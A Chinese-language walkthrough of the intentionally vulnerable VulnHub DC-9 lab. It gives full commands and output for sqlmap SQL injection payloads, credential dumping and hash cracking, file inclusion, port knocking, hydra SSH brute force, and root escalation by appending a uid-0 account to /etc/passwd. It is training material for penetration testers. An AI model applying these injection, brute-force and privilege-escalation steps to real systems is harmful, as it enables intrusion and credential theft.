DC9靶机下载地址
https://www.vulnhub.com/entry/dc-9,412/
靶机描述
Description
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
Technical Information
DC-9 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.
DC-9 has been tested successfully on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.
Important
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.
In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.
Credits
A big thanks goes out to the members of @m0tl3ycr3w.
Contact
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).
I can be contacted via Twitter - @DCAU7
实验环境
- 攻击vps(kali linux):ip_addr 172.25.0.69
- DC9靶机:mac_addr 00:0c:29:b1:3a:71
0x01 主机发现
通过抓包得到DC9靶机ip地址为172.25.0.71
kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
54 Captured ARP Req/Rep packets, from 4 hosts. Total size: 3240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
172.25.0.1 00:50:56:c0:00:08 19 1140 VMware, Inc.
172.25.0.2 00:50:56:f8:42:a0 17 1020 VMware, Inc.
172.25.0.71 00:0c:29:b1:3a:71 17 1020 VMware, Inc.
172.25.0.100 00:50:56:e5:b3:42 1 60 VMware, Inc.
0x02 端口扫描
目标靶机DC9开启了web服务和ssh服务。
kali@kali:~$ sudo nmap -A -p- 172.25.0.71
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 19:21 EST
Nmap scan report for 172.25.0.71
Host is up (0.00080s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:B1:3A:71 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 172.25.0.71
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.54 seconds
0x03 漏洞发现及利用
直接web上手
发现search.php页面存在数据库交互
bp抓包看是否存在sql注入
以下是验证过程,验证存在!
image.png
直接上sqlmap跑
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u http://172.25.0.71/results.php --data "search=1" -D users -T UserDetails --dump
___
__H__
___ ___["]_____ ___ ___ {1.4.2.30#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:46:24 /2020-03-03/
[18:46:25] [INFO] resuming back-end DBMS 'mysql'
[18:46:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3605 FROM (SELECT(SLEEP(5)))foDI) AND 'YuPB'='YuPB
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT CONCAT(0x7162767171,0x6f756a62416d4266637054726e4d7052654647774f556a4a5a5846717356785a5378545141687a43,0x716a707871),NULL,NULL,NULL,NULL,NULL-- -
---
[18:46:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:46:25] [INFO] fetching columns for table 'UserDetails' in database 'users'
[18:46:25] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
[18:46:25] [INFO] table 'users.UserDetails' dumped to CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71\dump\users\UserDetails.csv'
[18:46:25] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71'
[*] ending @ 18:46:25 /2020-03-03/
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u http://172.25.0.71/results.php --data "search=1" -D Staff -T Users --dump --thread 1000
___
__H__
___ ___["]_____ ___ ___ {1.4.2.30#dev}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:50:02 /2020-03-03/
[18:50:03] [INFO] resuming back-end DBMS 'mysql'
[18:50:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3605 FROM (SELECT(SLEEP(5)))foDI) AND 'YuPB'='YuPB
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT CONCAT(0x7162767171,0x6f756a62416d4266637054726e4d7052654647774f556a4a5a5846717356785a5378545141687a43,0x716a707871),NULL,NULL,NULL,NULL,NULL-- -
---
[18:50:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:50:03] [INFO] fetching columns for table 'Users' in database 'Staff'
[18:50:03] [INFO] fetching entries for table 'Users' in database 'Staff'
[18:50:03] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[18:50:04] [INFO] writing hashes to a temporary file 'C:\Users\Administrator\AppData\Local\Temp\sqlmapo88z6e7110392\sqlmaphashes-cjlb6jp7.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[18:50:05] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\Administrator\Desktop\burp\sqlmap-master\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[18:50:06] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[18:50:08] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[18:50:08] [INFO] starting 4 processes
[18:50:40] [INFO] using suffix '1'
[18:51:12] [INFO] cracked password 'transorbital1' for user 'admin'
Database: Staff
Table: Users
[1 entry]
+--------+--------------------------------------------------+----------+
| UserID | Password | Username |
+--------+--------------------------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin |
+--------+--------------------------------------------------+----------+
[18:51:12] [INFO] table 'Staff.Users' dumped to CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71\dump\Staff\Users.csv'
[18:51:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71'
[*] ending @ 18:51:12 /2020-03-03/
利用sql注入漏洞爆出后台管理账密
admin:transorbital1
使用admin账号登陆后台
发现在search.php和addrecord.php页面存在本地文件包含漏洞(由于页底包含页面显示文件不存在所以猜测存在本地文件包含)
证实如下
image.png
将以上收集到的用户和密码信息制作成用户字典和密码字典用来进行接下来的ssh爆破工作
进行ssh爆破
发现无法爆破,联想是否存在守护进程
继续利用文件包含漏洞发现存在守护进程
knockd功能介绍
简单来说就是用来隐藏ssh登陆端口。(也就是我们之前扫描端口时发现22端口阻塞)只有我们按照设定的顺序敲击端口,防火墙才会打开登陆端口。再按照同样的方式可以使防火墙关闭ssh登陆端口,如果别人不知道我们设定的端口敲击顺序,是无法登陆ssh的。我们可以下载knock来开启远程端口
image.png
查看配置文件信息发现,依次推敲7469,8475,9842端口即可打开ssh服务的22端口
命令如下
nc 172.25.0.71 7469
nc 172.25.0.71 8475
nc 172.25.0.71 9842
接下来使用hydra来进行密码爆破
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-03 06:17:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 153 login tries (l:9/p:17), ~10 tries per task
[DATA] attacking ssh://172.25.0.71:22/
[22][ssh] host: 172.25.0.71 login: chandlerb password: UrAG0D!
[22][ssh] host: 172.25.0.71 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-03 06:18:18
爆破得到dc9可登录ssh服务账号密码如下
chandlerb:UrAG0D!
janitor:Ilovepeepee
通过ssh登陆dc9进行信息收集
在janitor家目录下发现有用的密码信息
janitor@dc-9:~$ ls -alh
total 16K
drwx------ 4 janitor janitor 4.0K Mar 3 21:18 .
drwxr-xr-x 19 root root 4.0K Dec 29 20:02 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 21:48 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4.0K Mar 3 21:18 .gnupg
drwx------ 2 janitor janitor 4.0K Dec 29 17:10 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$
把收集到的密码信息放入密码字典继续进行密码爆破
kali@kali:~$ hydra -L user.dic -P password.dic 172.25.0.71 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-03 06:25:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 230 login tries (l:10/p:23), ~15 tries per task
[DATA] attacking ssh://172.25.0.71:22/
[22][ssh] host: 172.25.0.71 login: fredf password: B4-Tru3-001
[22][ssh] host: 172.25.0.71 login: chandlerb password: UrAG0D!
[22][ssh] host: 172.25.0.71 login: janitor password: Ilovepeepee
[22][ssh] host: 172.25.0.71 login: joeyt password: Passw0rd
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-03 06:26:14
又爆出两个用户的密码
login: fredf password: B4-Tru3-001
login: chandlerb password: UrAG0D!
login: janitor password: Ilovepeepee
login: joeyt password: Passw0rd
0x04 sudo 提权
使用fredf通过ssh服务登陆dc9
查看fredf用户能以root权限执行的一个py编译后的脚本
运行看看,提示使用python test.py 加参数 运行!
kali@kali:~$ ssh fredf@172.25.0.71
fredf@172.25.0.71's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 3 21:27:19 2020 from 172.25.0.69
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:/opt/devstuff/dist/test$ ./test
Usage: python test.py read append
通过find命令找到py源码,并查看该python源码
简单的解释一下这段代码作用,打开一个文件,把该文件的内容写入另一个文件。
fredf@dc-9:/opt/devstuff/dist/test$ find / -name "test.py" 2>/dev/null
/opt/devstuff/test.py
/usr/lib/python3/dist-packages/setuptools/command/test.py
fredf@dc-9:/opt/devstuff/dist/test$ cat /opt/devstuff/test.py
#!/usr/bin/python
import sys
if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)
else :
f = open(sys.argv[1], "r")
output = (f.read())
f = open(sys.argv[2], "a")
f.write(output)
f.close()
由此我们有一个思路,手写一个用户信息,写入/etc/passwd文件,设置uid=0,即可提权为root权限。
以下是提权过程:
尝试添加无密码root账号,发现不成功
故而使用openssh制作密码123456密文
openssl passwd -1 -salt whjy 123456
fredf@dc-9:/opt/devstuff$ echo zgjy::0:0:::/bin/bash >>/tmp/zgjy
fredf@dc-9:/opt/devstuff$ cd -
/opt/devstuff/dist/test
fredf@dc-9:/opt/devstuff/dist/test$ ./test /tmp/zgjy /etc/passwd
Traceback (most recent call last):
File "test.py", line 13, in <module>
PermissionError: [Errno 13] Permission denied: '/etc/passwd'
[3516] Failed to execute script test
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/zgjy /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su zgjy
su: user zgjy does not exist
fredf@dc-9:/opt/devstuff/dist/test$ sudo cat /etc/passwd
[sudo] password for fredf:
Sorry, user fredf is not allowed to execute '/usr/bin/cat /etc/passwd' as root on dc-9.
fredf@dc-9:/opt/devstuff/dist/test$ su - zgjy
su: user zgjy does not exist
fredf@dc-9:/opt/devstuff/dist/test$
fredf@dc-9:/opt/devstuff/dist/test$ echo 'whjy:$1$au$yiTIEVOOBr5S6eBjHZluV/:0:0:root:/bin/bash' >> /tmp/whjy
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/whjy /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su - whjy
Password:
su: Authentication failure
fredf@dc-9:/opt/devstuff/dist/test$ su - whjy
Password:
su: warning: cannot change directory to /bin/bash: Not a directory
# id
uid=0(root) gid=0(root) groups=0(root)
# /bin/bash
bash: /bin/bash/.bashrc: Not a directory
root@dc-9:/opt/devstuff/dist/test# cd
bash: cd: /bin/bash: Not a directory
root@dc-9:/opt/devstuff/dist/test# cd ~
bash: cd: /bin/bash: Not a directory
root@dc-9:/opt/devstuff/dist/test# cd /root
root@dc-9:/root# ls
theflag.txt
root@dc-9:/root# cat thrflag.txt
cat: thrflag.txt: No such file or directory
root@dc-9:/root# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.
sudo提权成功,并且拿到flag,dc系列靶机end!
网友评论